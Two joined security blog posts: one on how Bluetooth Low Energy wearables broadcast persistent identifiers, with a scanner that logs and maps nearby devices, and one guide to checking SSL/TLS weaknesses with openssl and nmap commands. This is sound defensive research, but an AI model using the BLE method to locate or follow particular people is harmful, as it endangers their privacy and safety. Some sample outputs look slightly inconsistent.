We’re currently on version 4.2 of the Bluetooth Core Specification, which means there’s been two point releases since BLE was first introduced. Interestingly the recent amendments seem to be backtracking on some of the original design principals of BLE: to implement light-weight encryption and keep packet sizes down. In fact they are entirely contrary, as they introduce longer packet lengths and Diffie-Hellman key exchanges.

Devices labelled as “Bluetooth Smart” support BLE, and those labelled as “Bluetooth Smart Ready” support both traditional Bluetooth and BLE.

Spectrum

BLE runs on 2.4GHz, the same radio spectrum as WiFi, regular Bluetooth and the ISM band. As we've written recently, this is a very congested section of the spectrum.

BLE’s power output is only 10mw (10dBm), a tenth of the power of 802.11 WiFi (100mw/20dBm) but is able to co-exist (most of the time…) in the spectrum with its more powerful neighbours through a variant of Bluetooth’s Frequency Hopping Spread Spectrum (FHSS) modulation. At that power, the range is restricted to less than 100m in an open area.

The BLE spectrum is divided into 37 data channels and 3 advertising channels. Established BLE connections hop across the data channels according to the channel map, which is agreed in the handshake protocol.

Advertising packets

Crucial to the operation of BLE, and important to following sections of this blog, is the fact that BLE devices constantly broadcast indirect advertising packets in order to advertise their presence. These packets are broadcast across the three advertising channels, and the first step of connecting two BLE devices is for one to respond to the other’s advertising packets.

Sometimes the advertising packets contain the device name, which may be unique such as the “Garmin Vivosmart #12345678” or the Samsung "GALAXY Gear (1234)", or are even user-chosen such as “Jules' Watch”. The advertising packets contain fields for manufacturer-specific data, including universally-unique IDs (UUIDs) for different services. Some of these UUIDs start with a manufacturer ID. For example, FitBit Charge HR fitness trackers all send the UUID "adabfb00-6e7d-4601-bda2-bffaa68956ba".

Many of these fields can be used to identify a product from a particular manufacturer, a particular model of product, and sometimes a particular device, which negates the effort made to disguise devices by randomising the MAC address.

Identifying devices

Like other network protocols, BLE relies on identifying devices by their MAC addresses. As they broadcast advertising packets constantly, any tool that logs BLE packets could be used to track a specific device. This issue is addressed in a blog from the Bluetooth SIG.

All BLE devices must have at least one public address or random address. Random addresses can be either a static address that is fixed for a power cycle, or a private address that is only resolvable with a shared key. The above blog says that random addresses mean that an attacker “…would not be able to determine that the series of different, randomly generated MAC addresses received from your device actually relates to the same physical device”.

Contrary to the intentions of the SIG, most of the devices we've seen have a random MAC address, in that it’s not possible to identify the vendor from the beginning of the address, but it’s still fixed. A test FitBit has had the same MAC address since we started this work, even though it’s completely run out of battery once. Some manufacturers have gone with public addresses, for example all the devices from Nike and MI that we've seen have Nike or MI MAC addresses (starting with 9C:A1:34 and 88:0F:10 respectively).

We've seen some devices that are clearly changing their MAC address for successive advertising packets. They are sometimes easy to identify as they have a counter that increments the last few bytes of the address, and often send out constant identifying information.

Authentication and encryption

Like regular Bluetooth, BLE supports a number of different schemes for pairing two devices. Version 4.2 of the specification introduced Secure Connections, which supports Elliptic Curve Diffie-Hellman for key exchange. Prior to 4.2, devices can choose between Just Works, Passkey Entry and Out of Band. Just Works is effectively no authentication, which at first seems like a terrible idea, but how do you authenticate to a device that doesn't have a screen or any input mechanism? If we care about security and privacy, we have to trust that the manufacturer has implemented their own.

The main purposed of pairing is to exchange encryption keys and set-up parameters. BLE does support encryption implemented in the protocol specification, but it is not always used in products that we've seen. Some vendors seem to have chosen to implement their own encryption of the underlying data, rather than rely on BLE security.

Mike Ryan’s work has shown that if you can capture the initial handshake, breaking some of the authentication schemes to recover the encryption key is not too hard, nor is figuring out the channel-hopping map. The likelihood of capturing the handshake is rare, as you typically only have to pair devices once.

Support in mobile phones

BLE has been supported by the major phone operating systems for some time now, for example since iOS v5, and Android 4.3.

Privacy

These devices, in their normal operation, broadcast constantly. The range is supposed to be around 100m in an open area, but as mentioned in the above previous research (albeit for regular Bluetooth), and from what we've seen in surveying for devices, devices can be detected at a greater range due to anomalies affecting RF propagation such as ducting. As mentioned about, the random MAC addresses are still largely fixed.

Whilst it was done for traditional Bluetooth, the “Bluesniping” work showed that with a high-gain (e.g. 19dBi), directional antenna it was possible to pick up regular Bluetooth packets at distances of half a mile. The same principle would work for BLE and the potential intercept range can be calculated using a free space loss model with losses to represent window panes and walls.

If I have an easy way to scan for these devices, and can attribute a device to a particular person such as a celebrity, your CEO or the police officer leading an investigation against your company, then I can easily tell when they’re nearby. Many of the available fitness trackers are waterproof and measure sleep, so there’s no need to ever take them off. Some stories are already starting to appear about organisations with concerns about wearable devices, for example the Chinese military.

Much has been written lately about the positive and negative effects or wearable technology and the “quantified self” (for example here and here). What is obvious is that many of these devices contain very personal information about someone's health and patterns of life, which can lead to amusing measurements, but also represent a wealth of data about an individual. Whilst many people are very happy to publish such information to social media others would be very protective of it.

Much like our previous work on IoT devices, it does seem like many manufacturers of wearable technology are keen to get their products to market as quickly as possible, with security sometimes tacked on as an afterthought. As far as fitness trackers are concerned, there has already been some good work on reverse engineering the protocol used by the Nike Fuelband.

Scanning for BLE devices on a laptop

The first thing we wanted to do was to scan for devices, and have a look at the traffic. Two of the common BLE System-on-Chip products out there are the Texas Instruments CC2540, and the Nordic Semiconductors NRF51. We went for the latter, which is available on the £30 development dongle, which comes with a free sniffing application, and has APIs to develop applications in C# and Python. For £50 Nordic also produces a development kit that can accept Arduino Uno compatible shields, and can run off battery power.


Both the development dongle and kit feature Segger chips that make the devices appear as mass storage devices, so you can programme them simply by dragging the compiled code onto the USB drive, and rebooting it. Compared to developing for embedded devices that require extra hardware programmers and debuggers, this is very easy. This shows how the vendors of the chips, such as Nordic, are trying hard to help people quickly develop products and get them to market.

The free Nordic sniffer lists all of the devices it can see, and allows you to launch Wireshark to collect traffic from a specific device. It doesn't log the devices seen, or store any of the data that it collects. We wrote an application in C# that scans for advertising data, and sends out scan requests to identify devices. It’s a console application that logs all the devices it sees into a database, along with all of the data from the advertising packets and scan responses. When it closes the application does some analysis on the database, to summarise the identified devices, to look for different devices that send the same field values and to look for repeated devices.

We've used the scan data to improve how many devices the scanner identifies, based on unique service data or UUIDs. For example, the Garmin Vivosmart fitness trackers have a device name that contains what looks like a unique ID. TomTom’s smart watch has a name chosen by the user. FitBit devices all transmit a services UUID that seems unique per range of models.

Survey results


The first thing to say is that there are a lot of devices out there. The Nordic dongle that we used for the survey has a short antenna-track on its PCB. Running from my desk on the fourth floor of an office on a averagely busy road on the Isle of Dogs, we were surprised at how many devices are out there, and not just amongst our geekier-than-average colleagues.

It was pretty much as we'd expect, with a couple of outliers. There's a wide selection of fitness trackers out there, primarily from FitBit, Jawbone and Garmin. There are also a lot of heart-rate monitors, a few bicycle devices and the odd Galaxy Gear. We've seen all the devices mentioned in this blog at least once.

We also saw lots of iPhones (they have a field that begins with the Apple manufacturer ID), or possibly a few iPhones that change their MAC address and the data they send out very frequently. A small proportion of these advertising packets are for AirDrop, as we looked into the format of those packets. More on that in another blog, maybe.

There was also one mysterious device that is very common (about two-thirds as common as iPhones) but we don’t know what it is. It's identifiable by the fixed UUID "35ee33ea68c74fbd868244eeb3df13e2".

Scanning for devices on a smart phone

Obviously the laptop isn’t entirely practical, so we also wanted an Android application to scan for devices. Some exist already (the Nordic one is pretty good), but we couldn’t find one that logs all the devices it sees, or tries to identify devices, or logs their location. So we decided to write our own.

Helpfully, Google published a sample application that scans for LE devices, and requests their GATT profiles. It’s not been updated to use the latest version of the Android API for Bluetooth LE, so we had to update. To make the application that we wanted, which is a decent proof-of-concept application for surveying devices, we added functionality to make it run as a background service, to store its data in a database, to log the logging of each device it sees, to export its database to the SD card, and to plot the location of the device on a Google Maps plugin. We even made an icon, although it did lead to lots of arguments.


Survey results

We looked for devices around our office, and on our commutes. A daily commute on the Central and Jubilee lines from Zone 4 to Canary Wharf detects around 100 devices.

To give you an idea as to how many of these devices are out there, half an hour near Canary Wharf station for lunch detected 149 devices. They included 26 FitBits, 2 Jawbones, a couple of Nike products, one Estimote iBeacon (we're not sure where) and an Alcatel Pop C5, and a lot of iPhones.

Try for yourself

This application will be available here on the Google Play Store from Friday 22nd May. It works fine on our test phones (a Nexus 4 and a Sony Xperia Z3), but it’s very much a proof of concept. It requires the new BLE libraries from Android 5.0. 

Please let us know if you see anything interesting, or find any terrible bugs.

Conclusions

BLE is not a new technology, but it's adoption for certain applications is novel. Compared to traditional Bluetooth, it enables a new means for electronic devices to constantly communicate with each other. Whilst wearable technology and other applications are becoming increasingly popular, do many of the owners of these devices realise that they broadcast constantly?

These broadcasts can almost always be attributed to a unique device, contrary to measures taken in the protocol to anonymise devices by randomising the MAC addresses. Depending on the product, some of these broadcasts can also be identified to a particular manufacturer, or the product model, or an individual product.

Scanning for these broadcasts is easy either with cheap hardware or with a smartphone. This allows us to identify and locate particular devices, which for devices such as fitness trackers that are designed to be worn all the time, means that we can identify and locate a person, to within a limited range.

There are clear implications to privacy, just as there are ways that this technology could be exploited for social engineering and crime.

All of this is a work in progress - we'd like to do more on the Android application, and we're keen to write a battery-powered scanner to run from the development kit. We've had a look at the security of some of the wearable devices, and may well write a future blog on some of our findings.

Follow Up and Contact

Scott is a part of our Research team in our London office.

Manually Testing SSL/TLS Weaknesses

$
0
0
The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols aim to provide client and server systems with a means of establishing an encrypted communication channel. Though best known for putting the "S" in HTTPS,  their use is not limited to web-based systems; they are also commonly used as a wrapper for other unencrypted services such as FTP.

While SSL has historically been the dominant protocol for securing the Internet, a rash of attacks in recent years has prompted a migration to its successor, TLS. This alone is not enough to guarantee a secure connection, however. TLS has also been found to have weaknesses and careful configuration is needed to avoid exposing communications to compromise from a network-based attacker. SSL/TLS flaws are widespread; SSL Pulse estimates that over three-quarters of the SSL/TLS deployments currently in use by the top one million websites are inadequately configured.

This post presents a review of the main SSL/TLS (mis)configurations and simple ways to test your system's susceptibility. The following configurations and attacks are considered:

  • SSLv2 Support
  • SSLv3 Support
  • Cipher Suites
  • SSL Certificates
  • Renegotiation
  • Compression
  • Implementation Issues

SSLv2 Support 

SSLv2 was released twenty years ago and soon after discovered to have significant weaknesses which could allow an attacker to decrypt and modify communications. It was superseded a year later by SSLv3 which addressed these issues, but despite its age and short lifespan SSLv2 support is still surprisingly common.

To check whether SSLv2 is enabled on the remote host, the following command can be used:

openssl s_client –ssl2 -connect example.com:443

If SSLv2 is supported, the handshake will complete and server certificate information will be returned, as shown in the following response:

openssl s_client -ssl2 -connect 10.0.0.1:443

CONNECTED(00000003)
depth=0 /C=AU/ST=/L=/O=Context/OU=context/CN=sslserver
verify error:num=18:self signed certificate
verify return:1
depth=0 /C=AU/ST=/L=/O=Context/OU=context/CN=sslserver
verify return:1
---
Server certificate
-----BEGIN CERTIFICATE-----
MIICnjCCAgugAwIBAgIJAPB2liVH7xRsMA0GCSqGSIb3DQEBBQUAMGwxCzAJBgNV
BAYTAkFVMREwDwYDVQQIDAhWaWN0b3JpYTESMBAGA1UEBwwJTWVsYm91cm5lMRAw
DgYDVQQKDAdDb250ZXh0MRAwDgYDVQQLDAdQbGF5cGVuMRIwEAYDVQQDDAlzc2xz
ZXJ2ZXIwHhcNMTQwMTE3MDMwNjAxWhcNMTcxMDEzMDMwNjAxWjBsMQswCQYDVQQG
EwJBVTERMA8GA1UECAwIVmljdG9yaWExEjAQBgNVBAcMCU1lbGJvdXJuZTEQMA4G
A1UECgwHQ29udGV4dDEQMA4GA1UECwwHUGxheXBlbjESMBAGA1UEAwwJc3Nsc2Vy
dmVyMIGbMA0GCSqGSIb3DQEBAQUAA4GJADCBhQJ+AJdlQF95PWaFnmN0hQd5BYUf
SALBHBDO+JkNIPj5evYEAoPql3Am6Uphv3Pxyd+scDowb7UrReH8dBltxfz0Id4V
3wpSJRdwo4Gx8xx27tLjDqbTaPKfSRWGpr0s2S2KJerr3XJvTDtWoiHN3zsx5kLU
qvKTm+3LNHp7DgwNAgMBAAGjUDBOMB0GA1UdDgQWBBS5W+orwrw8K5LuFRykGg9w
1DCanzAfBgNVHSMEGDAWgBS5W+orwrw8K5LuFRykGg9w1DCanzAMBgNVHRMEBTAD
AQH/MA0GCSqGSIb3DQEBBQUAA34AegQVwKLQseAu7krFdsrfL117Sfpk7BuucJXJ
nNbg9WRKFk5raikmp1nc5zLRZ4c6waDSX/rrT2g06IXSAJXmv5d2NYU+5YECJnY5
ApexOlQJvsunKXZdJvBC6FijyLGi8G9zbA5S++JQkXWtiiICPGF2afYI5ahBgGO2
hgE=
-----END CERTIFICATE-----
subject=/C=AU/ST=/L=/O=Context/OU=context/CN=sslserver
issuer=/C=AU/ST=/L=/O=Context/OU=context/CN=sslserver
--- No client certificate CA names sent --- Ciphers common between both SSL endpoints: RC4-MD5 EXP-RC4-MD5 RC2-CBC-MD5 EXP-RC2-CBC-MD5 DES-CBC-MD5 DES-CBC3-MD5 --- SSL handshake has read 807 bytes and written 233 bytes --- New, SSLv2, Cipher is DES-CBC3-MD5 Server public key is 1000 bit Secure Renegotiation IS NOT supported Compression: NONE Expansion: NONE SSL-Session: Protocol  : SSLv2 Cipher  : DES-CBC3-MD5 Session-ID: 3BD641677102DBE9BDADF9B990D2D716 Session-ID-ctx: Master-Key: D2AAB3751263EB53BAD83453D26A09DA1F700059FD16B510 Key-Arg  : DB92A6A80BF4CA4A Start Time: 1390178607 Timeout  : 300 (sec) Verify return code: 18 (self signed certificate)

If the server does not support SSLv2 the response will be a handshake failure error similar to the following:

CONNECTED(00000003)
458:error:1407F0E5:SSL routines:SSL2_WRITE:ssl handshake failure:s2_pkt.c:428:

SSLv3 Support

Despite some issues, SSLv3 was considered secure (at least when configured correctly) until last year when the Google Security Team introduced their Padding Oracle On Downgraded Legacy Encryption (POODLE) attack. POODLE demonstrated that, under certain conditions, it is possible to conduct a "padding oracle" attack against ciphers using cipher-block chaining (CBC) mode. This may allow decryption of communications and disclosure of session cookies. As the only non-CBC cipher supported in SSLv3, RC4, is also known to be cryptographically weak, the conclusion is that SSLv3 should not be used for communications. The Google Security Team further showed that an attacker can force the client and server to downgrade to SSLv3 even if they would normally use TLS, meaning that it is important to ensure that SSLv3 is disabled completely.

To test whether a system supports SSLv3, the following OpenSSL command can be used:

openssl s_client -ssl3 -connect google.com:443

CONNECTED(00000003) depth=2 /C=US/O=GeoTrust Inc./CN=GeoTrust Global CA verify error:num=20:unable to get local issuer certificate verify return:0 --- Certificate chain

--- Certificate details removed for brevity --- --- New, TLSv1/SSLv3, Cipher is RC4-SHA Server public key is 2048 bit Secure Renegotiation IS supported Compression: NONE Expansion: NONE SSL-Session: Protocol : SSLv3 Cipher : RC4-SHA Session-ID: 6E461AEAD8C1516F9D8950A9B5E735F9882BFC6EA0838D81CFD41C01A3799A41 Session-ID-ctx: Master-Key: 7E7680640BB7E2C83CBE87342727E0D09AC10EEEB095A8C0A2501EAE80FA1C20D3F3FE4346B1234057D6D506420273FA Key-Arg : None Start Time: 1421296281 Timeout : 7200 (sec) Verify return code: 0 (ok) ---

A handshake failure error would indicate that SSLv3 is not supported and the server is not vulnerable to POODLE.

Cipher Suites

One of the main functions of the SSL/TLS protocols is to allow the client and server to negotiate a mutually acceptable "cipher suite" to use for the connection. The cipher suite chosen specifies a set of algorithms which the client and server will use to perform key exchange, encryption, and message authentication.

A cipher suite is typically described in a format similar to this:

TLS_RSA_WITH_AES_128_CBC_SHA

where RSA is the key exchange algorithm, AES_128_CBC is the encryption cipher (AES using a 128-bit key operating in Cipher-Block Chaining mode), and SHA is the Message Authentication Code (MAC) algorithm.

The cipher suites a server is configured to support should be dictated by its security requirements. The following guidelines are generally recommended as a baseline:

  • The key exchange algorithm should be restricted to those which provide "perfect forward secrecy", such as Ephemeral Diffie-Hellman (DHE) or Ephemeral Elliptic Curve Diffie-Hellman (ECDHE).
  • The cipher should not suffer from known cryptanalytic flaws. This rules out RC4 which has been known to have flaws for many years and in the past few years has been shown to be significantly weaker than originally thought.
  • The cipher should use at least a 128 bit key (which rules out DES and Triple-DES).
  • Cipher-Block Chaining (CBC) mode is prone to padding oracle attacks and should ideally be avoided altogether, but specifically it should not be used in conjunction with SSLv3 or TLSv1.0 as this can lead to vulnerability to the BEAST attack. An alternative is Galois Counter Mode (GCM) which is not affected by these problems and offers authenticated encryption.
  • The message authentication algorithm should ideally be SHA256. MD5 is known to be cryptographically weak and should be avoided, and SHA1 (just denoted SHA in the cipher suite specifications) has its own weaknesses which place attacks within the realm of possibility.
  • For all three algorithms, the NULL / anon setting should be avoided as these provide no security at all. "Export" algorithms should also be disabled as their short key lengths make them susceptible to brute-force attacks and other attacks such as the FREAK attack.

Nmap's "ssl-enum-ciphers" script can be used to produce a list of the supported cipher suites in the following way:

nmap --script ssl-enum-ciphers -p 443 example.com

Example

nmap --script ssl-enum-ciphers -p 443 10.0.0.1

Nmap scan report for 10.0.0.1
PORT    STATE SERVICE REASON
443/tcp open  https   syn-ack
| ssl-enum-ciphers:
|   SSLv3
|     Ciphers (6)
|       TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA - unknown strength
|       TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA - weak
|       TLS_DH_anon_EXPORT_WITH_RC4_40_MD5 - broken
|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA - unknown strength
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_RSA_WITH_AES_256_CBC_SHA - unknown strength
|     Compressors (1)
|       uncompressed
|   TLSv1.0
|     Ciphers (6)
|       TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA - unknown strength
|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA - unknown strength
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_RSA_WITH_AES_256_CBC_SHA - unknown strength
|     Compressors (1)
|       uncompressed
|_ 

While nmap will give a strength rating for each supported cipher suite, the fast pace of change SSL/TLS security means that these ratings should be manually reviewed.

SSL Certificates

SSL/TLS supports the use of authentication via X.509 certificates, which are often termed "SSL certificates" when used in this context. Server certificates enable the client to verify that it is connecting to the correct host. Though not usually used for HTTPS, SSL/TLS can also support mutual authentication in which the client proves its own identity through the provision of its own certificate.

Some of the main security properties which should be considered when setting up a certificate, include:

  • "Not Before" - This gives the start date of the certificate and should be a date in the past.
  • "Not After" - This gives the expiry date of the certificate after which is should not be trusted. It is therefore important to ensure that this is a date in the future. As the expiry date approaches, a new certificate should be issued to replace it.
  • "Signature Algorithm" - This is the algorithm used to ensure the certificate's integrity. MD5 has been shown to be inadequate for this, with collision attacks allowing fake, but valid, certificates to be generated. SHA1 is in the process of being phased out due to known weaknesses, with SHA2 hash functions being the preferred alternative.
  • "Public-Key" - The public key should be long enough to ensure that attacks are computationally infeasible. In the case of RSA, 2048 bit public keys are now considered a sensible minimum to protect against factoring attacks.
  • "Issuer" - This is the entity which has issued the certificate and should be a trusted party recognised by both the client and server. The issuer is typically a third-party certificate authority (such as DigiCert in the example above), though larger organisations often operate their own certificate authority to sign certificates for internal use. While it is possible to generate so-called "self-signed" certificates, these prevent the client from authenticating the server and open up the possibility of man-in-the-middle attacks in which an attacker dupes the client and/or server into communicating with the attacker rather than each other.
  • "Subject" and "Subject Alternative Name" - These should contain the DNS information necessary to tie the IP of the server running the SSL/TLS service. If these values are not valid domain names (or wildcard domains), then the client will be unable to determine whether or not the certificate is associated with the server in question and cannot therefore use it to authenticate the server.

To view the details of a server's certificate, the following command can be used:

openssl s_client -connect example.com:443 | openssl x509 -noout -text

This will produce output similar to the following (here PayPal's certificate is shown):

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            0e:65:41:91:6c:e8:cf:b2:9b:7b:52:71:01:05:ba:c4
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA
        Validity
            Not Before: Dec 12 00:00:00 2014 GMT
            Not After : Dec 16 12:00:00 2016 GMT
        Subject: C=US, ST=California, L=San Jose, O=PayPal, Inc., OU=PayPal Production, CN=paypal.com
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:d5:c8:b2:65:07:ff:fb:71:0a:cf:a8:77:97:fc:
                    e1:a4:87:5d:79:29:03:e0:1a:5f:c2:f8:71:c9:ac:
                    bc:d3:16:e0:9c:2e:bb:d9:1c:5b:cc:90:7d:e3:54:
                    ab:53:79:50:37:63:b1:cb:68:56:ee:6a:5b:d2:10:
                    38:1a:35:f7:37:12:83:d9:72:51:9e:b7:f9:9c:1d:
                    b8:a9:e6:f3:27:bb:5b:8b:b9:be:fa:39:19:83:d9:
                    cd:66:69:1d:cc:8a:cb:59:b5:53:3e:ca:41:f6:ac:
                    89:4d:58:06:04:a5:e2:c9:94:05:26:6c:24:a6:81:
                    ca:4a:01:11:4c:a2:8d:83:7a:9a:2a:7d:16:93:ca:
                    a0:df:59:b8:e1:38:18:b2:bd:eb:77:6b:57:fb:7f:
                    d6:70:e1:2d:70:dd:cc:af:43:f0:de:a0:fc:2f:8e:
                    94:74:3c:4f:ae:ca:f6:f2:ab:09:7f:63:71:b6:27:
                    78:4d:f8:e1:e0:86:3a:81:9f:d4:55:45:27:ff:4d:
                    53:2f:99:43:28:ad:fa:c9:63:6f:64:28:36:d7:ea:
                    c3:00:50:88:86:a3:d0:83:ae:be:99:18:25:b2:44:
                    05:c6:e8:36:4a:fb:4d:ab:df:6d:0f:50:3f:80:fc:
                    38:ba:4c:53:c1:6d:48:22:68:7a:ed:6e:05:e4:9d:
                    58:ef
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier:
                keyid:51:68:FF:90:AF:02:07:75:3C:CC:D9:65:64:62:A2:12:B8:59:72:3B

            X509v3 Subject Key Identifier:
                1F:54:C7:2D:0E:D3:6C:C4:63:FE:66:1C:EA:8C:50:75:3A:01:8F:DE
            X509v3 Subject Alternative Name:
                DNS:paypal.com, DNS:www.paypal.com
            X509v3 Key Usage: critical
                Digital Signature, Key Encipherment
            X509v3 Extended Key Usage:
                TLS Web Server Authentication, TLS Web Client Authentication
            X509v3 CRL Distribution Points:

                Full Name:
                  URI:http://crl3.digicert.com/sha2-ha-server-g3.crl

                Full Name:
                  URI:http://crl4.digicert.com/sha2-ha-server-g3.crl

            X509v3 Certificate Policies:
                Policy: 2.16.840.1.114412.1.1
                  CPS: https://www.digicert.com/CPS

            Authority Information Access:
                OCSP - URI:http://ocsp.digicert.com
                CA Issuers - URI:http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt

            X509v3 Basic Constraints: critical
                CA:FALSE
    Signature Algorithm: sha256WithRSAEncryption
         3d:79:69:48:5d:f6:bc:4b:5f:81:f3:97:9d:61:e5:9c:46:b9:
         73:00:66:09:f1:8a:06:89:14:a3:25:ea:ba:a2:5d:ac:77:3a:
         8f:6a:8a:11:9b:c3:35:67:99:9f:9d:c2:c0:ac:9f:eb:24:58:
         c8:4a:be:07:31:30:8c:69:07:bc:ff:c0:5a:d1:17:c6:05:f7:
         75:ca:fe:cd:98:78:43:41:ac:14:75:f7:c9:10:f4:07:38:58:
         73:6a:84:58:1f:a9:31:7d:28:47:70:98:de:3f:d7:00:82:a6:
         5c:2e:5d:31:96:4a:06:82:a2:a0:02:95:fd:6f:ef:66:4a:57:
         50:c3:1a:84:48:26:47:73:6e:c8:d7:30:fb:75:11:d6:ee:67:
         7e:d4:15:b2:44:15:ef:ee:ab:ba:81:c2:f5:05:04:d1:f3:70:
         bb:96:41:03:eb:d1:e0:e4:3d:57:41:8d:3d:7a:df:f0:c1:68:
         6f:43:68:e1:8d:1e:19:7e:57:aa:49:43:28:2a:f1:8c:f7:0d:
         a4:6a:8c:18:75:6b:a4:cc:a7:2f:e5:21:d1:81:8c:d4:bc:f4:
         00:4c:f6:37:03:a3:61:33:b2:ea:15:34:48:53:83:48:57:6c:
         33:f2:b7:fb:f3:fc:ea:df:0d:d0:e2:49:01:b4:23:c9:3d:7a:
         f4:42:4f:98

Renegotiation

The SSL/TLS protocols allow the client and server to renegotiate new encryption keys during a session. A vulnerability was discovered in 2009 whereby an attacker could exploit a flaw in the renegotiation process and inject content into the start of the session, compromising the integrity of the session.

This is only possible if two conditions are met, namely that the server does not support secure renegotiation but does honour client-initiated renegotiations. These conditions can be checked for as described below:

Secure Renegotiation

The following demonstrates how to verify if a system supports secure renegotiation.

openssl s_client -connect example.com:443

A system that does not support secure renegotiation will return the following when a connection is established.

CONNECTED(00000003)
139677333890704:error:1407F0E5:SSL routines:SSL2_WRITE:ssl handshake failure:s2_pkt.c:429:
---
no peer certificate available
---
No client certificate CA names sent
---
SSL handshake has read 0 bytes and written 36 bytes
---
New, (NONE), Cipher is (NONE)
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : SSLv2
    Cipher    : 0000
    Session-ID: 
    Session-ID-ctx: 
    Master-Key: 
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1428910482
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---

Client Initiated Renegotiation

The following demonstrates how to check if client initiated renegotiation is supported.

openssl s_client -connect example.com:443

Once the connection is established, the server will wait for us to type the next command. We can write the following two lines in order to initiate a renegotiation by specifying R in the second line, followed by enter or return.

openssl s_client -connect host:port
HEAD / HTTP/1.0
R
<Enter or Return key>

 

A system that does not support client initiated renegotiation will return an error and end the connection, or the connection will time out.

RENEGOTIATING
write:errno=104


A system that supports client initiated renegotiation will keep the connection active, and respond to further commands.  

Compression

The use of compression has been linked to two side channel attacks: CRIME and BREACH.

CRIME

The Compression Ratio Info-leak Made Easy (CRIME) attack is a side-channel attack against TLS compression. To carry out the attack, the attacker needs to exert partial control over the content of requests made by the client (e.g. by using a Cross-Site Scripting vulnerability to force the user's browser to issue requests). The attacker can then observe the compressed size of these requests on the network and from that infer the contents of the remainder of the request (e.g. session cookies) based on the level of compression achieved.

To test whether a server supports TLS compression, and is vulnerable to CRIME, the following method can be used: 

openssl s_client -connect example.com:443

On the servers supporting compression, a response similar to the one below will be received, containing details about the compression. The lines "Compression: zlib compression" and "Compression: 1 (zlib compression)" indicate that the remote server is vulnerable to the CRIME attack. 

---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: zlib compression
Expansion: zlib compression
SSL-Session:
    Protocol  : TLSv1.1
    Cipher    : DHE-RSA-AES256-SHA
    Session-ID: 50791A02E03E42F8983344B25C8ED4598620518D5C917A3388239AAACE991858
    Session-ID-ctx: 
    Master-Key: 9FEDB91F439775B49A5C49342FF53C3DD7384E4AFC33F9C6AFB64EA3D639CA57253AD7D059BA54E01581AD3A73306342
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    0000 - 34 38 24 70 35 88 4a 68-0c 80 e6 c5 76 a1 0e ee   48$p5.Jh....v...
    0010 - 14 2e fb ef fa 42 f0 c1-58 ee 70 02 90 45 f4 8c   .....B..X.p..E..
    0020 - 7d 0b 2e 1e 71 70 b0 a2-cc 27 1b 13 29 cc f5 ee   }...qp...'..)...
    0030 - 84 43 98 fa b1 ae 83 dc-ff 6d aa 07 9f 7a 95 4f   .C.......m...z.O
    0040 - 44 68 63 21 72 d7 b9 18-97 d8 8e d7 61 7d 71 6f   Dhc!r.......a}qo
    0050 - a7 16 85 79 f9 a2 80 2a-b4 bc f9 47 78 6a b7 08   ...y...*...Gxj..
    0060 - f6 4f 09 96 7b e8 d4 9b-26 2d 1a fd 55 fe 6a ab   .O..{...&-..U.j.
    0070 - fc 8d 6d 87 7a 13 e1 a9-0a 05 09 d9 ce ea fe 70   ..m.z..........p
    0080 - 09 c9 5f 33 3c 5f 28 4e-20 3b 3a 10 75 c4 86 45   .._3<_(N ;:.u..E
    0090 - 1d 8b c8 a5 21 89 a1 12-59 b6 0f 55 e3 48 8f 91   ....!...Y..U.H..
    00a0 - 01 af 53 b6                                       ..S.

    Compression: 1 (zlib compression)
    Start Time: 1348073759
    Timeout   : 300 (sec)
    Verify return code: 20 (unable to get local issuer certificate)
---

 

For servers that have TLS compression disabled, the response will be similar to the following. The "Compression: NONE" shows that this server rejects usage of TLS-level compression. 

---
New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES128-GCM-SHA256
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES128-GCM-SHA256
    Session-ID: 7E49EA6457B200B441A26C05F1AE9634AAF97284AC7A12EC58F69CEF5470B052
    Session-ID-ctx: 
    Master-Key: E035F082F5545424373A546A1F76D77673E8AEE018B3F0A3AFD7A3545746013664C18E6BB69F08BFAECA6C7FB3010C9C
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 100800 (seconds)
    TLS session ticket:
    0000 - 66 72 6f 6e 74 70 61 67-65 61 61 61 61 61 61 61   frontpageaaaaaaa
    0010 - 89 55 c6 6a 92 c3 28 85-86 b0 ff c3 08 12 5a a8   .U.j..(.......Z.
    0020 - f2 ec f8 56 6d d3 29 99-7b 98 90 ef 57 fd c6 15   ...Vm.).{...W...
    0030 - ee a2 53 4b 43 ef 19 ee-41 25 1f 76 28 37 68 b6   ..SKC...A%.v(7h.
    0040 - 64 ca e7 3f 71 01 70 30-35 91 ef bc d8 19 20 4f   d..?q.p05..... O
    0050 - 9d 9e 2c ab 3f 35 5c 3f-65 f8 c6 9a a9 90 fa 60   ..,.?5\?e......`
